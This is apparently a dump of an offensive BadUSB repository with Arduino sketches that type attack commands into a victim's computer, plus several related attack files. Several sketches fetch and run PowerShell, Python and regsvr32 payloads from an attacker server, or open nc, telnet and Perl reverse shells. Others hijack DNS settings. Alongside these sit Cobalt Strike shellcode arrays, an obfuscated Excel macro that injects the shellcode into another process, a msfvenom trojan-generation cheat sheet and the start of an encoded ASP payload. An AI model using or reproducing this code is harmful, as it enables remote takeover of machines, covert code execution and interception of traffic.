Chr(40)&Chr(34)&"windir"&Chr(34)&Chr(41)&" "&Chr(38)&" "&Chr(34)&Chr(92)&Chr(92)&"System32"&Chr(92)&Chr(92)&"rundll32"&Chr(46)&"exe"&Chr(34)&Chr(10)&" End "&"If"&Chr(10)&Chr(10)&" res "&Chr(61)&" RunStuf"& _
"f"&Chr(40)&"sNull"&Chr(44)&" sProc"&Chr(44)&" ByVal 0"&Chr(38)&Chr(44)&" ByVal 0"&Chr(38)&Chr(44)&" ByVal 1"&Chr(38)&Chr(44)&" ByVal 4"&Chr(38)&Chr(44)&" ByVal 0"&Chr(38)&Chr(44)&" sNull"&Chr(44)&" sInfo"& _
Chr(44)&" pInfo"&Chr(41)&Chr(10)&Chr(10)&" rwxp"&"age "&Chr(61)&" AllocSt"&"uff"&Chr(40)&"pInfo"&Chr(46)&"hProcess"&Chr(44)&" 0"&Chr(44)&" UBound"&Chr(40)&"myArray"&Chr(41)&Chr(44)&" "&Chr(38)&"H1000"& _
Chr(44)&" "&Chr(38)&"H40"&Chr(41)&Chr(10)&" For "&"offset "&Chr(61)&" LBound"&Chr(40)&"myArray"&Chr(41)&" To UBou"&"nd"&Chr(40)&"myArray"&Chr(41)&Chr(10)&" "&"myByte "&Chr(61)&" myArray"&Chr(40)& _
"offset"&Chr(41)&Chr(10)&" "&"res "&Chr(61)&" WriteSt"&"uff"&Chr(40)&"pInfo"&Chr(46)&"hProcess"&Chr(44)&" rwxpage"&" "&Chr(43)&" offset"&Chr(44)&" myByte"&Chr(44)&" 1"&Chr(44)&" ByVal 0"&Chr(38)& _
Chr(41)&Chr(10)&" Next"&" offset"&Chr(10)&" res "&Chr(61)&" CreateS"&"tuff"&Chr(40)&"pInfo"&Chr(46)&"hProcess"&Chr(44)&" 0"&Chr(44)&" 0"&Chr(44)&" rwxpage"&Chr(44)&" 0"&Chr(44)&" 0"&Chr(44)&" 0"& _
Chr(41)&Chr(10)&"End Sub"&Chr(10)&"Sub Auto"&"Open"&Chr(40)&Chr(41)&Chr(10)&" Auto"&"_Open"&Chr(10)&"End Sub"&Chr(10)&"Sub Work"&"book_Ope"&"n"&Chr(40)&Chr(41)&Chr(10)&" Auto"&"_Open"&Chr(10)&"End Sub"& _
Chr(10)
objExcel.DisplayAlerts = False
on error resume next
objExcel.Run "Auto_Open"
objWorkbook.Close False
objExcel.Quit
' Restore the registry to its old state
if action = "" then
WshShell.RegDelete RegPath
else
WshShell.RegWrite RegPath, action, "REG_DWORD"
end if
]]>
</script>
</registration>
</scriptlet>
================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.txt
================================================
\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x70\x44\x42\x66\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00
================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.vba
================================================
myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _
13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _
-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _
-117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
-43,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-124,0,0,0,91,49,-55,81,81,106,3,81,81,104,36,5,0,0,83,80,104,87,-119,-97, _
-58,-1,-43,-21,112,91,49,-46,82,104,0,2,96,-124,82,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61,80,49,-1,87,87,106,-1,83,86, _
104,45,6,24,123,-1,-43,-123,-64,15,-124,-61,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1, _
-43,49,-1,87,106,7,81,86,80,104,-73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,116,-73,49,-1,-23,-111,1,0,0,-23,-55,1,0,0,-24,-117,-1, _
-1,-1,47,86,110,82,70,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97, _
105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97, _
105,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
83,73,69,32,49,48,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,50,59,32,87,105,110,54,52,59,32,120,54,52,59,32,84,114, _
105,100,101,110,116,47,54,46,48,41,13,10,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _
111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _
111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _
111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _
111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99, _
111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,105,100,117,46,99,111,109,0,98,97,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0, _
104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43, _
-123,-64,116,-58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-87,-3,-1,-1,49,57,50,46,49,54,56,46,49,53,52,46,49,51,49,0,0,0,0,0)
================================================
FILE: CobaltStrike_Trojanlinkage/PSL_TrojanExecution (LinkageWithCS).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.154.131:80/c'))\""); //访问Web Delivery-psl,恶意网址按照实际更改
delay(200);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: CobaltStrike_Trojanlinkage/PY_TrojanExecution (LinkageWithCS).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println("python -c \"import urllib2; exec urllib2.urlopen('http://192.168.154.131:80/d').read();\""); //访问Web Delivery-py,恶意网址按照实际更改
delay(200);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: CobaltStrike_Trojanlinkage/Pl_TrojanExecution (LinkageWithCS).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println("perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"IP:port");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};"); //访问Web Delivery-Perl,恶意网址按照实际更改
delay(200);
//Keyboard.println("./hacked.pl");
//delay(200);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: CobaltStrike_Trojanlinkage/Regsvr32_TrojanExecution (LinkageWithCS).ino
================================================
#include<Keyboard.h>
void setup() {//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
Keyboard.release(KEY_CAPS_LOCK); //释放大写键
delay(200);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(200);
Keyboard.press('r');//r键
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.println("cmd.exe");
delay(200);
Keyboard.println("regsvr32 /s /n /u /i:http://192.168.154.131:80/e scrobj.dll"); //访问Web Delivery-regsvr32,恶意网址按照实际更改
delay(200);
Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
================================================
FILE: CodePrincipleInterpretation/ArduinoKeyCodeBase.ino
================================================
//基础按键
KEY_LEFT_CTRL
KEY_LEFT_SHIFT
KEY_LEFT_ALT
KEY_LEFT_GUI //win键
KEY_RIGHT_CTRL
KEY_RIGHT_SHIFT
KEY_RIGHT_ALT
KEY_RIGHT_GUI
KEY_UP_ARROW
KEY_DOWN_ARROW
KEY_LEFT_ARROW
KEY_RIGHT_ARROW
KEY_BACKSPACE
KEY_TAB
KEY_RETURN//回车键
KEY_ESC
KEY_INSERT
KEY_DELETE
KEY_PAGE_UP
KEY_PAGE_DOWN
KEY_HOME
KEY_END
KEY_CAPS_LOCK
KEY_F1
KEY_F2
KEY_F3
KEY_F4
KEY_F5
KEY_F6
KEY_F7
KEY_F8
KEY_F9
KEY_F10
KEY_F11
KEY_F12
delay(5000);//延时毫秒
Keyboard.begin(); //开始键盘通讯
Keyboard.end(); //结束键盘通讯
Keyboard.press(); //按下键盘按键 如果是非特殊按键如 数字、字母按键用单引号括起来
Keyboard.release(); //释放键盘按键
Keyboard.println(“”); //输入字符串使用双引号括起来
Mouse.begin();//鼠标事件开始
Mouse.click();//鼠标单击
Mouse.end();//鼠标事件结束
Mouse.move();//鼠标移动(x,y)
Mouse.press();//鼠标按下
Mouse.release();//鼠标松开
Mouse.isPressed();
================================================
FILE: CodePrincipleInterpretation/InstructionsOn_setup_loop_Methods.txt
================================================
ʲôsetup
setup BadusbڲϺ״ִеĴ
Badusbͨʹõľsetup
ֻҪд
void setup(){//д}
ʲôloop
loopѭڲѭ£еĴѭִУдһϰF5ѭ룬ܲϺԾͻ
ΪʲôBadusbһдsetup
ԭܼ
㽫дloopлᵼԼҲĴ룬ΪһĵԾͣ
ôµĴд룬ǿд룬ҪĻñȽϸ
================================================
FILE: CodePrincipleInterpretation/MSF_TrojanMakingTutorial.txt
================================================
msf木马制作
1、在攻击者终端操作:
msfvenom -p windows/meterpreter/reverse_tcp lhost=kaliIP lport=<Your Port> -f exe >/root/Desktop/evilshell.exe
-p 参数后跟上payload(攻击载荷)
lhost 后跟监听的IP
lport 后跟监听的端口
-f 后跟要生成后门文件的类型
-o 指定输出文件及类型
-i 混淆次数
-e 混淆模式
例如:exe木马:
msfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP> lport=<Your Port> -f exe -o virus.exe -e x86/shikata_ga_nai -i 8
jsp木马:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw > virus.jsp
#Powershell木马:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f psh-reflection > virus.psl
#JAVA木马:
msfvenom -p java/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f jar -o virus.jar
#PHP木马:
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw -o virus.php
#ASP木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f asp > virus.asp
#ASPX木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f aspx > virus.aspx
#Python木马:
msfvenom -p python/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw > virus.py
#Android木马:
msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -o virus.apk
#Bash木马:
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP> LPORT=<Your Port> -f raw > virus.sh
#Linux木马:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f elf > shell.elf
#Mac木马:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f macho > shell.macho
#WAR木马:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f war > shell.war
#Perl木马:
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP LPORT=<Your Port> -f raw > shell.pl
2、开启postgresql数据库:(简单攻击可省略)
/etc/init.d/postgresql status 查看postgresql服务的状态
/etc/init.d/postgresql start 开启postgresql服务
netstat -ntulp 查看端口
3、启动msf监听,等待BadUSB插入,对方上线:
msfconsole 开启MSF
msf5>use exploit/multi/handler 选择exploits
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 设置payload,注意与上方payload相同
show options 查看所需设置的参数
set lhost KaliIP (设置监听地址,注意与上方lhost相同)
set lport <Your Port> 设置监听端口
run 或者exploit 运行攻击模块
================================================
FILE: DNSHijack/DOS_CommandSetMultipleDNS(DNSHijack).ino
================================================
void setup() {
Keyboard.begin();//开始键盘通讯
delay(3000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("cmd /c netsh interface ip set dns \"Local Area Connection\" static 127.0.0.1-192.168.1.1&&netsh interface ip set dns \"????\" static 127.0.0.1-192.168.1.1"); //DOS命令设置多个DNS
Keyboard.end();
}
void loop() {
}
================================================
FILE: DNSHijack/PSL_CommandSetMultipleDNS(DNSHijack).ino
================================================
void setup(){
Keyboard.begin();
delay(3000);
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.println("POWERSHELL.EXE -C START-PROCESS POWERSHELL -VERB RUNAS");
Keyboard.println();
delay(1000);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.print('y');
Keyboard.release(KEY_LEFT_ALT);
delay(500);
Keyboard.println("CMD");
delay(50);
Keyboard.println("NETSH INTERFACE IP SET DNS \"lOCAL aREA cCONNECTION\" STATIC 127.0.0.1-192.168.1.1&&EXIT");
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();
}
void loop(){
}
================================================
FILE: LICENSE
================================================
BSD 3-Clause License
Copyright (c) 2021, wwy
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: Linux_Built-inReverseShell/LinuxReverseShell (CodeExecution).ino
================================================
void setup()
{
delay(5000);
terminal();
delay(3000);
Keyboard.println("echo INPUT0 > /tmp/pay");
delay(100);
Keyboard.println("echo INPUT1 >> /tmp/pay");
delay(100);
Keyboard.println("echo INPUT2 >> /tmp/pay");
delay(100);
Keyboard.println("echo INPUT3 >> /tmp/pay");
delay(100);
Keyboard.println("echo INPUT4 >> /tmp/pay");
delay(100);
Keyboard.println("echo INPUT5 >> /tmp/pay");
delay(100);
Keyboard.println("echo INPUT6 >> /tmp/pay");
delay(2000);
Keyboard.println("xxd -r -p /tmp/pay /tmp/payload");
delay(2000);
Keyboard.println("chmod +x /tmp/payload");
Keyboard.println("/tmp/payload &");
delay(2000);
Keyboard.println("exit");
}
void loop()
{
}
void terminal()
{
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.send_now();
Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
Keyboard.send_now();
Keyboard.set_key1(KEY_T);
Keyboard.send_now();
delay(100);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
================================================
FILE: Linux_Built-inReverseShell/LinuxReverseShell(BashShell).ino
================================================
# define PAYLOAD1 "mknod bp1 p && nc INPUT0 INPUT1 0<bp1 | /bin/bash 1>bp1 &"
//# define PAYLOAD2 "/bin/bash -i > /dev/tcp/192.168.1.40/8080 0<&1 2>&1 &"
#define PAYLOAD3 "mknod bp2 p && telnet INPUT2 INPUT3 0<bp2 | /bin/bash 1>bp2 &"
void setup()
{
delay(5000);
terminal();
delay(3000);
Keyboard.println(PAYLOAD1);
delay(2000);
//Keyboard.println(PAYLOAD2);
//delay(2000);
Keyboard.println(PAYLOAD3);
delay(2000);
Keyboard.println("exit");
}
void loop()
{
}
void terminal()
{
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.send_now();
Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
Keyboard.send_now();
Keyboard.set_key1(KEY_T);
Keyboard.send_now();
delay(100);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
================================================
FILE: Linux_Built-inReverseShell/LinuxReverseShell(PerlShell).ino
================================================
void setup()
{
delay(5000);
terminal();
delay(3000);
Keyboard.print("perl -MIO -e '$p=fork;exit,if");
delay(100);
Keyboard.print("($p);$c=new IO::Socket::INET");
delay(100);
Keyboard.print("(PeerAddr,\"INPUT0:INPUT1\"");
delay(100);
Keyboard.print(");STDIN->fdopen($c,r);$~->");
delay(100);
Keyboard.print("fdopen($c,w);system$_ ");
delay(100);
Keyboard.println("while<>;'");
delay(1000);
Keyboard.println("exit");
}
void loop()
{
}
void terminal()
{
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.send_now();
Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
Keyboard.send_now();
Keyboard.set_key1(KEY_T);
Keyboard.send_now();
delay(100);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
}
================================================
FILE: MSF_Trojanlinkage/Shell_TrojanGenerationConfiguration.txt
================================================
IP192.168.43.242
port4444
exeľ
msfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP> lport=<Your Port> -f exe -o shell.exe -e x86/shikata_ga_nai -i 8
jspľ
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.jsp
#Powershellľ:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f psh-reflection > shell.psl
#JAVAľ:
msfvenom -p java/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f jar -o shell.jar
#PHPľ:
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw -o shell.php
#ASPľ:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f asp > shell.asp
#ASPXľ:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f aspx > shell.aspx
#Pythonľ:
msfvenom -p python/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.py
#Androidľ:
msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -o shell.apk
#Bashľ:
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.sh
#Linuxľ
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f elf > shell.elf
#Macľ
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f macho > shell.macho
#WARľ
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f war > shell.war
#Perlľ
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP LPORT=<Your Port> -f raw > shell.pl
================================================
FILE: MSF_Trojanlinkage/shell.asp
================================================
<% @language="VBScript" %>
<%
Sub gJjCrDeBtLBn()
wvWPLP=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(128)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101)
